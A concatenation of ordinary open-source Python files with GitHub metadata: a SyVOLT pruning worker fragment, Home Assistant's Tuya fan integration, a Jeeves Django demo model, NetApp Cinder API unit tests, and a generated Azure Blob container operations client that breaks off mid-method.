if not self.pruner.isPathConditionStillFeasible(pc, self.rulesToTreat):
pcs_to_prune.append(pc_name)
#print("Current length: " + str(len(self.currentPathConditionSet)))
#print("New length: " + str(len(newPathConditionSet)))
self.currentPathConditionSet = list(set(self.currentPathConditionSet))
pruning_debug = False
if self.pruner.do_pruning:
#pruning_time = time.time()
for pathCondName in pcs_to_prune:
#print("Pruning: " + pathCondName)
#
try:
del self.pc_dict[pathCondName]
if pruning_debug:
print("Pruned from new pc dict: " + pathCondName)
except KeyError:
pass
delete_graph(pathCondName)
try:
del new_pc_dict[pathCondName]
if pruning_debug:
print("Pruned from new pc dict: " + pathCondName)
except KeyError:
pass
# work around bug
if pathCondName not in pcs_to_prune_less:
try:
newPathConditionSet.remove(pathCondName)
if pruning_debug:
print("Pruned from new path cond set: " + pathCondName)
except ValueError:
pass
if pathCondName not in name_dict:
try:
self.currentPathConditionSet.remove(pathCondName)
if pruning_debug:
print("Pruned from set: " + pathCondName)
except ValueError:
pass
# else:
# del name_dict[pathCondName]
# try:
# #delete_graph(name_dict[pathCondName])
# print("Removing: " + name_dict[pathCondName])
# #del name_dict[pathCondName]
# except KeyError:
# pass
# for key, value in dict.copy(name_dict).items():
# if pathCondName == value:
# del name_dict[key]
#print("Time taken for pruning: " + str(time.time() - pruning_time))
self.currentPathConditionSet.extend(newPathConditionSet)
self.currentPathConditionSet = list(set(self.currentPathConditionSet))
# print("currentPathConditionSet: " + str(self.currentPathConditionSet))
# print("new_pc_dict: " + str(new_pc_dict.keys()))
# print("name_dict: " + str(name_dict.keys()))
if self.pruner.do_pruning:
self.pruner.print_results()
#print(asizeof.asized(self, detail = 2).format())
#print("Thread finished: Took " + str(time.time() - start_time) + " seconds")
self.worker_list[0] = self.currentPathConditionSet
self.worker_list[1] = new_pc_dict
self.worker_list[2] = name_dict
| {
"content_hash": "df837feab69b51a87918580ef739f88f",
"timestamp": "",
"source": "github",
"line_count": 707,
"max_line_length": 154,
"avg_line_length": 47.001414427157,
"alnum_prop": 0.45428829371050256,
"repo_name": "levilucio/SyVOLT",
"id": "6ae650c025a6ccf00bd32265f246f7e3529dfcf9",
"size": "33231",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "path_condition_generator_worker.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "166159"
},
{
"name": "Python",
"bytes": "34207588"
},
{
"name": "Shell",
"bytes": "1118"
}
],
"symlink_target": ""
} |
"""Support for Tuya Fan."""
from __future__ import annotations
from typing import Any
from tuya_iot import TuyaDevice, TuyaDeviceManager
from homeassistant.components.fan import (
DIRECTION_FORWARD,
DIRECTION_REVERSE,
FanEntity,
FanEntityFeature,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.util.percentage import (
ordered_list_item_to_percentage,
percentage_to_ordered_list_item,
)
from . import HomeAssistantTuyaData
from .base import EnumTypeData, IntegerTypeData, TuyaEntity
from .const import DOMAIN, TUYA_DISCOVERY_NEW, DPCode, DPType
TUYA_SUPPORT_TYPE = {
"fs", # Fan
"fsd", # Fan with Light
"fskg", # Fan wall switch
"kj", # Air Purifier
}
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up tuya fan dynamically through tuya discovery."""
hass_data: HomeAssistantTuyaData = hass.data[DOMAIN][entry.entry_id]
@callback
def async_discover_device(device_ids: list[str]) -> None:
"""Discover and add a discovered tuya fan."""
entities: list[TuyaFanEntity] = []
for device_id in device_ids:
device = hass_data.device_manager.device_map[device_id]
if device and device.category in TUYA_SUPPORT_TYPE:
entities.append(TuyaFanEntity(device, hass_data.device_manager))
async_add_entities(entities)
async_discover_device([*hass_data.device_manager.device_map])
entry.async_on_unload(
async_dispatcher_connect(hass, TUYA_DISCOVERY_NEW, async_discover_device)
)
class TuyaFanEntity(TuyaEntity, FanEntity):
"""Tuya Fan Device."""
_direction: EnumTypeData | None = None
_oscillate: DPCode | None = None
_presets: EnumTypeData | None = None
_speed: IntegerTypeData | None = None
_speeds: EnumTypeData | None = None
_switch: DPCode | None = None
def __init__(
self,
device: TuyaDevice,
device_manager: TuyaDeviceManager,
) -> None:
"""Init Tuya Fan Device."""
super().__init__(device, device_manager)
self._switch = self.find_dpcode(
(DPCode.SWITCH_FAN, DPCode.SWITCH), prefer_function=True
)
self._attr_preset_modes = []
if enum_type := self.find_dpcode(
(DPCode.FAN_MODE, DPCode.MODE), dptype=DPType.ENUM, prefer_function=True
):
self._presets = enum_type
self._attr_supported_features |= FanEntityFeature.PRESET_MODE
self._attr_preset_modes = enum_type.range
# Find speed controls, can be either percentage or a set of speeds
dpcodes = (
DPCode.FAN_SPEED_PERCENT,
DPCode.FAN_SPEED,
DPCode.SPEED,
DPCode.FAN_SPEED_ENUM,
)
if int_type := self.find_dpcode(
dpcodes, dptype=DPType.INTEGER, prefer_function=True
):
self._attr_supported_features |= FanEntityFeature.SET_SPEED
self._speed = int_type
elif enum_type := self.find_dpcode(
dpcodes, dptype=DPType.ENUM, prefer_function=True
):
self._attr_supported_features |= FanEntityFeature.SET_SPEED
self._speeds = enum_type
if dpcode := self.find_dpcode(
(DPCode.SWITCH_HORIZONTAL, DPCode.SWITCH_VERTICAL), prefer_function=True
):
self._oscillate = dpcode
self._attr_supported_features |= FanEntityFeature.OSCILLATE
if enum_type := self.find_dpcode(
DPCode.FAN_DIRECTION, dptype=DPType.ENUM, prefer_function=True
):
self._direction = enum_type
self._attr_supported_features |= FanEntityFeature.DIRECTION
def set_preset_mode(self, preset_mode: str) -> None:
"""Set the preset mode of the fan."""
if self._presets is None:
return
self._send_command([{"code": self._presets.dpcode, "value": preset_mode}])
def set_direction(self, direction: str) -> None:
"""Set the direction of the fan."""
if self._direction is None:
return
self._send_command([{"code": self._direction.dpcode, "value": direction}])
def set_percentage(self, percentage: int) -> None:
"""Set the speed of the fan, as a percentage."""
if self._speed is not None:
self._send_command(
[
{
"code": self._speed.dpcode,
"value": int(self._speed.remap_value_from(percentage, 1, 100)),
}
]
)
return
if self._speeds is not None:
self._send_command(
[
{
"code": self._speeds.dpcode,
"value": percentage_to_ordered_list_item(
self._speeds.range, percentage
),
}
]
)
def turn_off(self, **kwargs: Any) -> None:
"""Turn the fan off."""
self._send_command([{"code": self._switch, "value": False}])
def turn_on(
self,
percentage: int = None,
preset_mode: str = None,
**kwargs: Any,
) -> None:
"""Turn on the fan."""
if self._switch is None:
return
commands: list[dict[str, str | bool | int]] = [
{"code": self._switch, "value": True}
]
if percentage is not None and self._speed is not None:
commands.append(
{
"code": self._speed.dpcode,
"value": int(self._speed.remap_value_from(percentage, 1, 100)),
}
)
return
if percentage is not None and self._speeds is not None:
commands.append(
{
"code": self._speeds.dpcode,
"value": percentage_to_ordered_list_item(
self._speeds.range, percentage
),
}
)
if preset_mode is not None and self._presets is not None:
commands.append({"code": self._presets.dpcode, "value": preset_mode})
self._send_command(commands)
def oscillate(self, oscillating: bool) -> None:
"""Oscillate the fan."""
if self._oscillate is None:
return
self._send_command([{"code": self._oscillate, "value": oscillating}])
@property
def is_on(self) -> bool | None:
"""Return true if fan is on."""
if self._switch is None:
return None
return self.device.status.get(self._switch)
@property
def current_direction(self) -> str | None:
"""Return the current direction of the fan."""
if (
self._direction is None
or (value := self.device.status.get(self._direction.dpcode)) is None
):
return None
if value.lower() == DIRECTION_FORWARD:
return DIRECTION_FORWARD
if value.lower() == DIRECTION_REVERSE:
return DIRECTION_REVERSE
return None
@property
def oscillating(self) -> bool | None:
"""Return true if the fan is oscillating."""
if self._oscillate is None:
return None
return self.device.status.get(self._oscillate)
@property
def preset_mode(self) -> str | None:
"""Return the current preset_mode."""
if self._presets is None:
return None
return self.device.status.get(self._presets.dpcode)
@property
def percentage(self) -> int | None:
"""Return the current speed."""
if self._speed is not None:
if (value := self.device.status.get(self._speed.dpcode)) is None:
return None
return int(self._speed.remap_value_to(value, 1, 100))
if self._speeds is not None:
if (value := self.device.status.get(self._speeds.dpcode)) is None:
return None
return ordered_list_item_to_percentage(self._speeds.range, value)
return None
@property
def speed_count(self) -> int:
"""Return the number of speeds the fan supports."""
if self._speeds is not None:
return len(self._speeds.range)
return 100
| {
"content_hash": "363c7fec0880c150c082570b1f47f2f5",
"timestamp": "",
"source": "github",
"line_count": 261,
"max_line_length": 87,
"avg_line_length": 33.13026819923372,
"alnum_prop": 0.5716433445125477,
"repo_name": "toddeye/home-assistant",
"id": "2d16ed36d404bda99ff49f22296301365a6e42fa",
"size": "8647",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/tuya/fan.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3005"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "47414832"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
from django.db.models import CharField
from jeevesdb.JeevesModel import JeevesModel as Model, JeevesForeignKey as ForeignKey
from sourcetrans.macro_module import macros, jeeves
from jeevesdb.JeevesModel import label_for
import JeevesLib
# An example model.
# Right now self-reference is either impossible or difficult because JeevesForeignKey
# only supports a model class (not a string) as the related object. (TODO fix this.)
class UserProfile(Model):
username = CharField(max_length=1024)
email = CharField(max_length=1024)
class Address(Model):
zipcode=CharField(max_length=5)
def String(self):
return self.zipcode
class Individual(Model):
address = ForeignKey(Address, blank=True, null = True)
def Address(self):
return self.address
@staticmethod
def jeeves_get_private_address(individual):
restrictedAddress=Address.objects.create(zipcode=individual.address.zipcode[:2]+"***")
return restrictedAddress
@staticmethod
@label_for('address')
@jeeves
def jeeves_restrict_Individuallabel(individual, ctxt):
return False
from django.dispatch import receiver
from django.db.models.signals import post_syncdb
import sys
current_module = sys.modules[__name__]
@receiver(post_syncdb, sender=current_module)
def dbSynced(sender, **kwargs):
execfile("sampleData.py")
| {
"content_hash": "5df57445c2c11a152a7e22320d6ac29c",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 88,
"avg_line_length": 31.585365853658537,
"alnum_prop": 0.7837837837837838,
"repo_name": "BambooL/jeeves",
"id": "f1ef19d7966c58c003a2f7e31532df332c615627",
"size": "1295",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "demo/tests/foreignkey2Parent/jelf/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24672"
},
{
"name": "HTML",
"bytes": "183277"
},
{
"name": "JavaScript",
"bytes": "81040"
},
{
"name": "Makefile",
"bytes": "9025"
},
{
"name": "Python",
"bytes": "673325"
},
{
"name": "Shell",
"bytes": "110"
}
],
"symlink_target": ""
} |
"""
Tests for NetApp API layer
"""
from cinder.i18n import _
from cinder import test
from cinder.volume.drivers.netapp.dataontap.client import api as netapp_api
class NetAppApiElementTransTests(test.TestCase):
"""Test case for NetApp API element translations."""
def setUp(self):
super(NetAppApiElementTransTests, self).setUp()
def test_translate_struct_dict_unique_key(self):
"""Tests if dict gets properly converted to NaElements."""
root = netapp_api.NaElement('root')
child = {'e1': 'v1', 'e2': 'v2', 'e3': 'v3'}
root.translate_struct(child)
self.assertEqual(3, len(root.get_children()))
self.assertEqual('v1', root.get_child_content('e1'))
self.assertEqual('v2', root.get_child_content('e2'))
self.assertEqual('v3', root.get_child_content('e3'))
def test_translate_struct_dict_nonunique_key(self):
"""Tests if list/dict gets properly converted to NaElements."""
root = netapp_api.NaElement('root')
child = [{'e1': 'v1', 'e2': 'v2'}, {'e1': 'v3'}]
root.translate_struct(child)
self.assertEqual(3, len(root.get_children()))
children = root.get_children()
for c in children:
if c.get_name() == 'e1':
self.assertIn(c.get_content(), ['v1', 'v3'])
else:
self.assertEqual('v2', c.get_content())
def test_translate_struct_list(self):
"""Tests if list gets properly converted to NaElements."""
root = netapp_api.NaElement('root')
child = ['e1', 'e2']
root.translate_struct(child)
self.assertEqual(2, len(root.get_children()))
self.assertIsNone(root.get_child_content('e1'))
self.assertIsNone(root.get_child_content('e2'))
def test_translate_struct_tuple(self):
"""Tests if tuple gets properly converted to NaElements."""
root = netapp_api.NaElement('root')
child = ('e1', 'e2')
root.translate_struct(child)
self.assertEqual(2, len(root.get_children()))
self.assertIsNone(root.get_child_content('e1'))
self.assertIsNone(root.get_child_content('e2'))
def test_translate_invalid_struct(self):
"""Tests if invalid data structure raises exception."""
root = netapp_api.NaElement('root')
child = 'random child element'
self.assertRaises(ValueError, root.translate_struct, child)
def test_setter_builtin_types(self):
"""Tests str, int, float get converted to NaElement."""
root = netapp_api.NaElement('root')
root['e1'] = 'v1'
root['e2'] = 1
root['e3'] = 2.0
root['e4'] = 8l
self.assertEqual(4, len(root.get_children()))
self.assertEqual('v1', root.get_child_content('e1'))
self.assertEqual('1', root.get_child_content('e2'))
self.assertEqual('2.0', root.get_child_content('e3'))
self.assertEqual('8', root.get_child_content('e4'))
def test_setter_na_element(self):
"""Tests na_element gets appended as child."""
root = netapp_api.NaElement('root')
root['e1'] = netapp_api.NaElement('nested')
self.assertEqual(1, len(root.get_children()))
e1 = root.get_child_by_name('e1')
self.assertIsInstance(e1, netapp_api.NaElement)
self.assertIsInstance(e1.get_child_by_name('nested'),
netapp_api.NaElement)
def test_setter_child_dict(self):
"""Tests dict is appended as child to root."""
root = netapp_api.NaElement('root')
root['d'] = {'e1': 'v1', 'e2': 'v2'}
e1 = root.get_child_by_name('d')
self.assertIsInstance(e1, netapp_api.NaElement)
sub_ch = e1.get_children()
self.assertEqual(2, len(sub_ch))
for c in sub_ch:
self.assertIn(c.get_name(), ['e1', 'e2'])
if c.get_name() == 'e1':
self.assertEqual('v1', c.get_content())
else:
self.assertEqual('v2', c.get_content())
def test_setter_child_list_tuple(self):
"""Tests list/tuple are appended as child to root."""
root = netapp_api.NaElement('root')
root['l'] = ['l1', 'l2']
root['t'] = ('t1', 't2')
l = root.get_child_by_name('l')
self.assertIsInstance(l, netapp_api.NaElement)
t = root.get_child_by_name('t')
self.assertIsInstance(t, netapp_api.NaElement)
for le in l.get_children():
self.assertIn(le.get_name(), ['l1', 'l2'])
for te in t.get_children():
self.assertIn(te.get_name(), ['t1', 't2'])
def test_setter_no_value(self):
"""Tests key with None value."""
root = netapp_api.NaElement('root')
root['k'] = None
self.assertIsNone(root.get_child_content('k'))
def test_setter_invalid_value(self):
"""Tests invalid value raises exception."""
root = netapp_api.NaElement('root')
try:
root['k'] = netapp_api.NaServer('localhost')
except Exception as e:
if not isinstance(e, TypeError):
self.fail(_('Error not a TypeError.'))
def test_setter_invalid_key(self):
"""Tests invalid value raises exception."""
root = netapp_api.NaElement('root')
try:
root[None] = 'value'
except Exception as e:
if not isinstance(e, KeyError):
self.fail(_('Error not a KeyError.'))
| {
"content_hash": "2d4480146dd74c73ae5c452e733141cf",
"timestamp": "",
"source": "github",
"line_count": 138,
"max_line_length": 75,
"avg_line_length": 39.70289855072464,
"alnum_prop": 0.5831356086877167,
"repo_name": "tlakshman26/cinder-bug-fix-volume-conversion-full",
"id": "7910a68ca7629774dce87da0e935eb910e6e20c7",
"size": "6343",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "cinder/tests/unit/volume/drivers/netapp/dataontap/client/test_api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "12371444"
},
{
"name": "Shell",
"bytes": "8172"
}
],
"symlink_target": ""
} |
import datetime
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ContainerOperations:
"""ContainerOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.storage.blob.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def create(
self,
timeout: Optional[int] = None,
metadata: Optional[str] = None,
access: Optional[Union[str, "_models.PublicAccessType"]] = None,
request_id_parameter: Optional[str] = None,
container_cpk_scope_info: Optional["_models.ContainerCpkScopeInfo"] = None,
**kwargs
) -> None:
"""creates a new container under the specified account. If the container with the same name
already exists, the operation fails.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param metadata: Optional. Specifies a user-defined name-value pair associated with the blob.
If no name-value pairs are specified, the operation will copy the metadata from the source blob
or file to the destination blob. If one or more name-value pairs are specified, the destination
blob is created with the specified metadata, and metadata is not copied from the source blob or
file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming
rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more
information.
:type metadata: str
:param access: Specifies whether data in the container may be accessed publicly and the level
of access.
:type access: str or ~azure.storage.blob.models.PublicAccessType
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param container_cpk_scope_info: Parameter group.
:type container_cpk_scope_info: ~azure.storage.blob.models.ContainerCpkScopeInfo
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_default_encryption_scope = None
_prevent_encryption_scope_override = None
if container_cpk_scope_info is not None:
_default_encryption_scope = container_cpk_scope_info.default_encryption_scope
_prevent_encryption_scope_override = container_cpk_scope_info.prevent_encryption_scope_override
restype = "container"
accept = "application/xml"
# Construct URL
url = self.create.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if metadata is not None:
header_parameters['x-ms-meta'] = self._serialize.header("metadata", metadata, 'str')
if access is not None:
header_parameters['x-ms-blob-public-access'] = self._serialize.header("access", access, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
if _default_encryption_scope is not None:
header_parameters['x-ms-default-encryption-scope'] = self._serialize.header("default_encryption_scope", _default_encryption_scope, 'str')
if _prevent_encryption_scope_override is not None:
header_parameters['x-ms-deny-encryption-scope-override'] = self._serialize.header("prevent_encryption_scope_override", _prevent_encryption_scope_override, 'bool')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
create.metadata = {'url': '/{containerName}'} # type: ignore
async def get_properties(
self,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
**kwargs
) -> None:
"""returns all user-defined metadata and system properties for the specified container. The data
returned does not include the container's list of blobs.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
restype = "container"
accept = "application/xml"
# Construct URL
url = self.get_properties.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-meta']=self._deserialize('str', response.headers.get('x-ms-meta'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access'))
response_headers['x-ms-has-immutability-policy']=self._deserialize('bool', response.headers.get('x-ms-has-immutability-policy'))
response_headers['x-ms-has-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-has-legal-hold'))
response_headers['x-ms-default-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-default-encryption-scope'))
response_headers['x-ms-deny-encryption-scope-override']=self._deserialize('bool', response.headers.get('x-ms-deny-encryption-scope-override'))
if cls:
return cls(pipeline_response, None, response_headers)
get_properties.metadata = {'url': '/{containerName}'} # type: ignore
async def delete(
self,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""operation marks the specified container for deletion. The container and any blobs contained
within it are later deleted during garbage collection.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
restype = "container"
accept = "application/xml"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
delete.metadata = {'url': '/{containerName}'} # type: ignore
async def set_metadata(
self,
timeout: Optional[int] = None,
metadata: Optional[str] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""operation sets one or more user-defined name-value pairs for the specified container.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param metadata: Optional. Specifies a user-defined name-value pair associated with the blob.
If no name-value pairs are specified, the operation will copy the metadata from the source blob
or file to the destination blob. If one or more name-value pairs are specified, the destination
blob is created with the specified metadata, and metadata is not copied from the source blob or
file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming
rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more
information.
:type metadata: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_modified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
restype = "container"
comp = "metadata"
accept = "application/xml"
# Construct URL
url = self.set_metadata.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
